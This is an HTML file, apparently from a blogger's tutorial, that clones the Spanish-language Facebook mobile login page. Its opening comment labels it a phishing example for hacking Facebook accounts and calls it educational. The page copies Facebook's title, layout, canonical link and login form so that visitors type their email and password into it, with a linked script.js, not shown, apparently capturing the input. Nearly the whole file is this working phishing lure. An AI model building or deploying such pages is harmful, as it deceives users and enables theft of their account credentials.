<html>
<!--
    Ejemplo de hackeo de Facebook con Phishing

    @author parzibyte
    Más tutoriales en: parzibyte.me/blog

    NOTA: el autor no se hace cargo de los daños que esto pueda
    ocasionar, solo se hace con fines educativos :)
-->
<head>
    <title>Iniciar sesión en Facebook | Facebook</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
    <link href="./css/c.png" rel="shortcut icon" sizes="196x196">
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
    <link type="text/css" rel="stylesheet" href="./css/a.css">
    <link type="text/css" rel="stylesheet" href="./css/b.css">

    <meta name="description"
        content="Inicia sesión en Facebook para empezar a compartir y conectarte con tus amigos, tus familiares y las personas que conoces.">
    <link rel="canonical" href="https://www.facebook.com/login/">

</head>

<body tabindex="0" class="touch x1 _fzu _50-3 iframe acw portrait"
    style="min-height: 264px; background-color: rgb(255, 255, 255);">

    <div id="viewport" data-kaios-focus-transparent="1" style="min-height: 264px;">
        <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
        <div id="page" class="">
            <div class="_129_" id="header-notices"></div>
            <div class="_7om2 _52we _52z5" id="header">
                <div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter"><a href="/login/?refid=9"><i
                            class="img sp_qshnus3k8er sx_4fcd1c"><u>facebook</u></i></a></div>
            </div>
            <div class="_5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane"
                style="min-height: 264px;">
                <div class="_7om2">
                    <div class="_4g34" id="u_0_0">
                        <div class="_5yd0 _2ph- _5yd1" style="display: none;" data-sigil="m_login_notice">
                            <div class="_52jd"></div>
                        </div>
                        <div class="acy apm abb" data-sigil="marea"><span class="mfsm">Primero tienes que entrar en
                                Facebook.</span></div>
                        <div class="aclb _4-4l">
                            <div id="login_top_banner" data-sigil="m_login_upsell login_identify_step_element"></div>
                            <div class="_5rut">
                                <div></div>
                                <form method="post"
                                    action="/login/device-based/login/async/?next=https%3A%2F%2Fm.facebook.com%2Fnotifications.php&amp;refsrc=https%3A%2F%2Fm.facebook.com%2Fnotifications.php&amp;lwv=100"
                                    class="mobile-login-form _5spm" id="login_form" novalidate="1"
                                    data-sigil="m_login_form" data-autoid="autoid_2"><input type="hidden" name="lsd"
                                        value="AVoUwr2_" autocomplete="off"><input type="hidden" name="jazoest"
                                        value="2725" autocomplete="off"><input type="hidden" name="m_ts"
                                        value="1560891841"><input type="hidden" name="li"
                                        value="wVEJXXEL6LENOri7KsNdQ9mR"><input type="hidden" name="try_number"
                                        value="0" data-sigil="m_login_try_number"><input type="hidden"
                                        name="unrecognized_tries" value="0" data-sigil="m_login_unrecognized_tries">
                                    <div id="user_info_container" data-sigil="user_info_after_failure_element"></div>
                                    <div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div>
                                    <div id="otp_retrieve_desc_container"></div>
                                    <div class="_56be _5sob">
                                        <div class="_55wo _55x2 _56bf">
                                            <div id="email_input_container"><input autocorrect="off"
                                                    autocapitalize="off" class="_56bg _4u9z _5ruq" autocomplete="on"
                                                    id="m_login_email" name="email"
                                                    placeholder="Número de celular o correo electrónico" type="text"
                                                    data-sigil="m_login_email"></div>
                                            <div>
                                                <div class="_1upc _mg8" data-sigil="m_login_password">
                                                    <div class="_7om2">
                                                        <div class="_4g34 _5i2i _52we">
                                                            <div class="_5xu4"><input autocorrect="off"
                                                                    autocapitalize="off" class="_56bg _4u9z _27z2"
                                                                    autocomplete="on" id="m_login_password" name="pass"
                                                                    placeholder="Contraseña" type="password"
                                                                    data-sigil="password-plain-text-toggle-input"></div>
                                                        </div>
                                                        <div class="_5s61 _216i _5i2i _52we">
                                                            <div class="_5xu4">
                                                                <div class="_2pi9" style="display:none" id="u_0_1"><a
                                                                        href="#"
                                                                        data-sigil="password-plain-text-toggle"><span
                                                                            class="mfss" style="display:none"
                                                                            id="u_0_2">OCULTAR</span><span class="mfss"
                                                                            id="u_0_3">MOSTRAR</span></a></div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="_2pie" style="text-align:center;">
                                        <div id="u_0_4" data-sigil="login_password_step_element"><button type="button"
                                                value="Iniciar sesión" class="_54k8 _52jh _56bs _56b_ _28lf _56bw _56bu"
                                                name="login" id="l" data-sigil="touchable m_login_button"
                                                data-autoid="autoid_4"><span class="_55sr">Iniciar
                                                    sesión</span></button></div>
                                        <div class="_7eif" id="oauth_login_button_container" style="display:none"></div>
                                        <div class="_7f_d" id="oauth_login_desc_container" style="display:none"></div>
                                        <div id="otp_button_elem_container"></div>
                                    </div><input type="hidden" name="prefill_contact_point"
                                        id="prefill_contact_point"><input type="hidden" name="prefill_source"
                                        id="prefill_source"><input type="hidden" name="prefill_type"
                                        id="prefill_type"><input type="hidden" name="first_prefill_source"
                                        id="first_prefill_source"><input type="hidden" name="first_prefill_type"
                                        id="first_prefill_type"><input type="hidden" name="had_cp_prefilled"
                                        id="had_cp_prefilled" value="false"><input type="hidden"
                                        name="had_password_prefilled" id="had_password_prefilled" value="false"><input
                                        type="hidden" name="is_smart_lock" id="is_smart_lock" value="false">
                                    <div class="_xo8"></div><noscript><input type="hidden" name="_fb_noscript"
                                            value="true" /></noscript>
                                </form>
                                <div>
                                    <div class="_43mg"><span class="_43mh">o</span></div>
                                    <div class="_52jj _5t3b" id="u_0_6"><a role="button"
                                            class="_5t3c _28le btn btnS medBtn mfsm touchable" id="signup-button"
                                            tabindex="0" data-sigil="m_reg_button" data-autoid="autoid_3">Crear cuenta
                                            nueva</a></div>
                                </div>
                                <div>
                                    <div class="other-links">
                                        <ul class="_5pkb _55wp">
                                            <li><span class="mfss fcg"><a tabindex="0"
                                                        href="/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php%26refsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php&amp;r&amp;cuid&amp;ars=facebook_login&amp;lwv=100&amp;refid=9"
                                                        id="forgot-password-link">¿Olvidaste tu contraseña?</a><span
                                                        aria-hidden="true"> · </span><a href="/help/?refid=9"
                                                        id="help-link" class="sec">Servicio de ayuda</a></span></li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                            <div></div>
                        </div>
                    </div>
                </div>
                <div></div><span><img src="./css/e.gif" width="0" height="0" style="display:none"></span>
                <div class="_55wr _5ui2">
                    <div class="_5dpw">
                        <div class="_5ui3" data-nocookies="1" id="locale-selector" data-sigil="language_selector marea">
                            <div class="_7om2">
                                <div class="_4g34"><span class="_52jc _52j9 _52jh _3ztb">Español</span>
                                    <div class="_3ztc"><span class="_52jc"><a
                                                href="/a/language.php?l=pt_BR&amp;lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php%26refsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php&amp;gfid=AQA0ms5_dKM7O9Mg&amp;refid=9"
                                                data-locale="pt_BR" data-sigil="change_language">Português
                                                (Brasil)</a></span></div>
                                    <div class="_3ztc"><span class="_52jc"><a
                                                href="/a/language.php?l=de_DE&amp;lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php%26refsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php&amp;gfid=AQAHMB_5p_HGtrgQ&amp;refid=9"
                                                data-locale="de_DE" data-sigil="change_language">Deutsch</a></span>
                                    </div>
                                    <div class="_3ztc"><span class="_52jc"><a
                                                href="/a/language.php?l=ar_AR&amp;lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php%26refsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php&amp;gfid=AQDxTXKO_aPIMakX&amp;refid=9"
                                                data-locale="ar_AR" data-sigil="change_language">العربية</a></span>
                                    </div>
                                </div>
                                <div class="_4g34">
                                    <div class="_3ztc"><span class="_52jc"><a
                                                href="/a/language.php?l=en_US&amp;lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php%26refsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php&amp;gfid=AQChm7c1GlTDe8D0&amp;refid=9"
                                                data-locale="en_US" data-sigil="change_language">English (US)</a></span>
                                    </div>
                                    <div class="_3ztc"><span class="_52jc"><a
                                                href="/a/language.php?l=fr_FR&amp;lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php%26refsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php&amp;gfid=AQCxI3yhZPwx_U6H&amp;refid=9"
                                                data-locale="fr_FR" data-sigil="change_language">Français
                                                (France)</a></span></div>
                                    <div class="_3ztc"><span class="_52jc"><a
                                                href="/a/language.php?l=it_IT&amp;lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php%26refsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php&amp;gfid=AQCMDCF5qjdmuUHa&amp;refid=9"
                                                data-locale="it_IT" data-sigil="change_language">Italiano</a></span>
                                    </div><a
                                        href="/language.php?n=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php%26refsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Fnotifications.php&amp;refid=9">
                                        <div class="_3j87 _1rrd _3ztd" aria-label="Lista completa de idiomas"
                                            data-sigil="more_language"><i class="img sp_qshnus3k8er sx_2ec446"></i>
                                        </div>
                                    </a>
                                </div>
                            </div>
                        </div>
                        <div class="_5ui4"><span class="mfss fcg">Facebook ©2019</span></div>
                    </div>
                </div>
            </div>
            <div class=""></div>
            <div class="viewportArea _2v9s" style="display:none" id="u_0_7" data-sigil="marea">
                <div class="_5vsg" id="u_0_8" style="max-height: 674px;"></div>
                <div class="_5vsh" id="u_0_9" style="max-height: 328px;"></div>
                <div class="_5v5d fcg">
                    <div class="_2so _2sq _2ss img _50cg" data-animtype="1"
                        data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Cargando...
                </div>
            </div>
            <div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea">
                <div class="container">
                    <div class="image"></div>
                    <div class="message" data-sigil="error-message"></div><a class="link"
                        data-sigil="MPageError:retry">Intentar de nuevo</a>
                </div>
            </div>
        </div>
    </div>
    <div id="static_templates">
        <div class="mDialog" id="modalDialog" style="display:none" data-sigil=" context-layer-root"
            data-autoid="autoid_1">
            <div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader">
                <div class="_7om2 _52we">
                    <div class="_5s61">
                        <div class="_52z7"><button type="submit" value="Cancelar"
                                class="cancelButton btn btnD bgb mfss touchable" id="u_0_b"
                                data-sigil="dialog-cancel-button">Cancelar</button><button type="submit" value="Atrás"
                                class="backButton btn btnI bgb mfss touchable iconOnly" aria-label="Atrás" id="u_0_c"
                                data-sigil="dialog-back-button"><i class="img sp_qshnus3k8er sx_7ebdaa"
                                    style="margin-top: 2px;"></i></button></div>
                    </div>
                    <div class="_4g34">
                        <div class="_52z6">
                            <div class="_50l4 mfsl fcw" id="m-future-page-header-title"
                                data-sigil="m-dialog-header-title dialog-title">Cargando...</div>
                        </div>
                    </div>
                    <div class="_5s61">
                        <div class="_52z8" id="modalDialogHeaderButtons"></div>
                    </div>
                </div>
            </div>
            <div class="modalDialogView" id="modalDialogView"></div>
            <div class="_5v5d _5v5e fcg" id="dialogSpinner">
                <div class="_2so _2sq _2ss img _50cg" data-animtype="1" id="u_0_a"
                    data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Cargando...
            </div>
        </div>
    </div>
    <script src="./script.js"></script>
</body>
</html>